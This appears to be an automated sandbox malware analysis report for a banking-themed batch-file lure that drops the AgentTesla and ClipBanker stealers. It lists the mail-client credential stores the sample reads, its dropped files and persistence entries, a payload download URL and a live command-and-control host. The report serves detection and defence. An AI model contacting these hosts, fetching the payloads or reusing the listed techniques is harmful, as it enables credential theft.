Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Source: Yara match	File source: 13.0.neworigin.exe.d90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001C.00000002.2693859207.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.1512401609.0000000000D92000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1691089667.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2692159904.0000000003051000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: neworigin.exe PID: 4352, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: neworigin.exe PID: 7572, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 13.0.neworigin.exe.d90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001C.00000002.2693859207.0000000002CC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1691089667.00000000030C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2693859207.0000000002CBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2692159904.000000000307C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2693859207.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.1512401609.0000000000D92000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2692159904.0000000003084000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1691089667.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1691089667.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2692159904.0000000003051000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: neworigin.exe PID: 4352, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: neworigin.exe PID: 7572, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	1 Valid Accounts	121 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	21 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	1 Taint Shared Content	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 DLL Side-Loading	1 Valid Accounts	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 System Network Connections Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Shared Modules	1 Valid Accounts	1 Access Token Manipulation	3 Obfuscated Files or Information	1 Credentials in Registry	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	311 Process Injection	1 Timestomp	NTDS	47 System Information Discovery	Distributed Component Object Model	21 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 Scheduled Task/Job	21 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	1 DLL Side-Loading	LSA Secrets	1 Query Registry	SSH	1 Clipboard Data	123 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	21 Registry Run Keys / Startup Folder	311 Masquerading	Cached Domain Credentials	331 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Valid Accounts	DCSync	1 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	151 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	151 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	311 Process Injection	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat	24%	ReversingLabs	Win32.Trojan.Malcab

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\server_BTC.exe	100%	Avira	HEUR/AGEN.1311721
C:\Users\user\AppData\Local\Temp\neworigin.exe	100%	Avira	TR/Spy.Gen8
C:\Users\Public\Libraries\Wisrysxl.PIF	100%	Avira	HEUR/AGEN.1326052
C:\Users\user\AppData\Local\Temp\x.exe	100%	Avira	HEUR/AGEN.1326052
C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	100%	Avira	HEUR/AGEN.1311721
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	100%	Avira	W32/Infector.Gen
C:\Users\user\AppData\Local\Temp\server_BTC.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\neworigin.exe	100%	Joe Sandbox ML
C:\Users\Public\Libraries\Wisrysxl.PIF	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\x.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	100%	Joe Sandbox ML
C:\Users\Public\Libraries\Wisrysxl.PIF	24%	ReversingLabs	Win32.Trojan.Generic
C:\Users\Public\Libraries\lxsyrsiW.pif	3%	ReversingLabs
C:\Users\Public\alpha.pif	0%	ReversingLabs
C:\Users\Public\xpha.pif	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\neworigin.exe	88%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
C:\Users\user\AppData\Local\Temp\server_BTC.exe	66%	ReversingLabs	ByteCode-MSIL.Infostealer.ClipBanker
C:\Users\user\AppData\Local\Temp\x.exe	24%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	66%	ReversingLabs	ByteCode-MSIL.Infostealer.ClipBanker

Source	Detection	Scanner	Label
https://gxe0.com/yak/233_Wisrysxlfss	0%	Avira URL Cloud	safe
https://gxe0.com/	0%	Avira URL Cloud	safe
https://gxe0.com/yak/233_Wisrysxlfssb	0%	Avira URL Cloud	safe
https://gxe0.com:443/yak/233_Wisrysxlfss	0%	Avira URL Cloud	safe
https://gxe0.com/yak/233_Wisrysxlfsst	0%	Avira URL Cloud	safe
https://gxe0.com/yak/233_Wisrysx	0%	Avira URL Cloud	safe
http://s82.gocheapweb.com	0%	Avira URL Cloud	safe
https://gxe0.com/yak/233_WisrysxlfssV;	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
gxe0.com	198.252.105.91	true	false	high
api.ipify.org	104.26.12.205	true	false	high
s82.gocheapweb.com	51.195.88.199	true	true	unknown
pywolwnvd.biz	54.244.188.177	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high
https://gxe0.com/yak/233_Wisrysxlfss	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0	x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 0000000F.00000002.1626082872.0000000005F49000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gxe0.com/yak/233_Wisrysx	x.exe, 00000004.00000002.1526389874.00000000207ED000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://account.dyn.com/	neworigin.exe, 0000000D.00000000.1512401609.0000000000D92000.00000002.00000001.01000000.00000009.sdmp	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000F.00000002.1600643610.0000000005035000.00000004.00000800.00020000.00000000.sdmp	false		high
http://r11.o.lencr.org0#	neworigin.exe, 0000000D.00000002.1663428780.0000000001485000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1691089667.0000000003261000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1663428780.0000000001464000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1736152536.00000000068CC000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1691089667.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1736152536.000000000688E000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002CC4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2731631118.00000000065BA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2685889113.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2685889113.000000000110E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000000F.00000002.1600643610.0000000005035000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000F.00000002.1600643610.0000000005035000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#	x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 0000000F.00000002.1626082872.0000000005F49000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 0000000F.00000002.1626082872.0000000005F49000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.ipify.org/t	neworigin.exe, 0000000D.00000002.1691089667.0000000003051000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002C4C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 0000000F.00000002.1600643610.0000000005035000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gxe0.com/	x.exe, 00000004.00000002.1509390491.00000000005F0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://r11.i.lencr.org/0	neworigin.exe, 0000000D.00000002.1663428780.0000000001485000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1691089667.0000000003261000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1663428780.0000000001464000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1736152536.00000000068CC000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1691089667.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1736152536.000000000688E000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002CC4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2731631118.00000000065BA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2685889113.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2685889113.000000000110E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.ipify.org	neworigin.exe, 0000000D.00000000.1512401609.0000000000D92000.00000002.00000001.01000000.00000009.sdmp, neworigin.exe, 0000000D.00000002.1691089667.0000000003051000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002C4C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gxe0.com/yak/233_Wisrysxlfssb	x.exe, 00000004.00000002.1509390491.00000000005BE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore6lB	powershell.exe, 0000000F.00000002.1600643610.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	neworigin.exe, 0000000D.00000002.1663428780.0000000001485000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1691089667.0000000003261000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1663428780.0000000001464000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1736152536.00000000068CC000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1691089667.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002CC4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2731631118.00000000065BA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2685889113.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2685889113.000000000110E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	neworigin.exe, 0000000D.00000002.1663428780.0000000001485000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1691089667.0000000003261000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1663428780.0000000001464000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1736152536.00000000068CC000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1691089667.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002CC4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2731631118.00000000065BA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2685889113.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2685889113.000000000110E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000000F.00000002.1600643610.0000000005035000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 0000000F.00000002.1626082872.0000000005F49000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 0000000F.00000002.1626082872.0000000005F49000.00000004.00000800.00020000.00000000.sdmp	false		high
http://s82.gocheapweb.com	neworigin.exe, 0000000D.00000002.1691089667.00000000030C9000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1691089667.0000000003261000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002CBC000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002E51000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://gxe0.com:443/yak/233_Wisrysxlfss	x.exe, 00000004.00000002.1509390491.0000000000631000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://gxe0.com/yak/233_Wisrysxlfsst	x.exe, 00000004.00000002.1509390491.00000000005BE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://gxe0.com/yak/233_WisrysxlfssV;	x.exe, 00000004.00000002.1509390491.00000000005F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	neworigin.exe, 0000000D.00000002.1691089667.0000000003051000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1600643610.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002C4C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.pmail.com	x.exe, x.exe, 00000004.00000002.1534436929.0000000021DEF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1506456469.0000000000686000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1534105002.0000000021BF0000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1443906217.000000000287C000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1510941907.000000000287E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1526389874.00000000206E3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1526389874.0000000020764000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1540551626.000000007FC4F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1444132666.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 0000000C.00000000.1506872662.0000000000416000.00000002.00000001.01000000.00000007.sdmp, Wisrysxl.PIF, 0000001A.00000002.1660368294.0000000002B12000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001B.00000000.1636599259.0000000000416000.00000002.00000001.01000000.00000007.sdmp, Wisrysxl.PIF, 0000001E.00000002.1742914385.0000000002B52000.00000004.00001000.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0C	x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.26.12.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
198.252.105.91	gxe0.com	Canada	20068	HAWKHOSTCA	false
51.195.88.199	s82.gocheapweb.com	France	16276	OVHFR	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1553795
Start date and time:	2024-11-11 18:01:26 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	38
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat
Detection:	MAL
Classification:	mal100.spre.troj.spyw.evad.winBAT@54/27@5/3
EGA Information:	Successful, ratio: 70%
HCA Information:	Successful, ratio: 97% Number of executed functions: 244 Number of non-executed functions: 34
Cookbook Comments:	Found application associated with file extension: .bat

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target TrojanAIbot.exe, PID 5352 because it is empty
Execution Graph export aborted for target powershell.exe, PID 3832 because it is empty
Execution Graph export aborted for target server_BTC.exe, PID 3160 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat

Simulations

Behavior and APIs

Time	Type	Description
12:02:25	API Interceptor	2x Sleep call for process: x.exe modified
12:02:37	API Interceptor	24x Sleep call for process: powershell.exe modified
12:02:38	API Interceptor	350724x Sleep call for process: TrojanAIbot.exe modified
12:02:39	API Interceptor	534544x Sleep call for process: neworigin.exe modified
12:02:43	API Interceptor	2x Sleep call for process: Wisrysxl.PIF modified
18:02:34	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Wisrysxl C:\Users\Public\Wisrysxl.url
18:02:36	Task Scheduler	Run new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
18:02:43	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Wisrysxl C:\Users\Public\Wisrysxl.url
18:02:52	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.12.205	Ransomware Mallox.exe	Get hash	malicious	Targeted Ransomware	Browse	api.ipify.org/
	Yc9hcFC1ux.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	6706e721f2c06.exe	Get hash	malicious	Remcos	Browse	api.ipify.org/
	perfcc.elf	Get hash	malicious	Xmrig	Browse	api.ipify.org/
	SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	hloRQZmlfg.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
198.252.105.91	DHL-INVOICE-MBV.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.legaldanaa.com/d0ad/?jXu=gWBUvkz7Th1w/4or5wJyBYQATVQKYMhDH/gPz8FNlyuh7t8wp+tSlul7hgK6xuyfJYQ1BxvuzK7AKBkx6IgPVHnLyXh5nXmxBA==&hZ=5jUpdPs
51.195.88.199	New_Order_PO_GM5637H93.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine, XWorm	Browse
	New_Order_PO_GM5637H93.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse
	AENiBH7X1q.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse
	New_Order_568330_Material_Specifications.exe	Get hash	malicious	AgentTesla, MassLogger RAT, Phoenix Stealer, RedLine, SugarDump, XWorm	Browse
	RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse
	PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse
	PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse
	RFQ -PO.20571-0001-QBMS-PRQ-0200140.js	Get hash	malicious	AgentTesla, RedLine	Browse
	ORDER_DOCU_NWQ89403984-DETAILS.MPEG.PNG.CMD.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse
	RFQ_PO_KMM7983972_ORDER_DETAILS.js	Get hash	malicious	AgentTesla, RedLine	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s82.gocheapweb.com	New_Order_PO_GM5637H93.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine, XWorm	Browse	51.195.88.199
	New_Order_PO_GM5637H93.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	51.195.88.199
	AENiBH7X1q.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	51.195.88.199
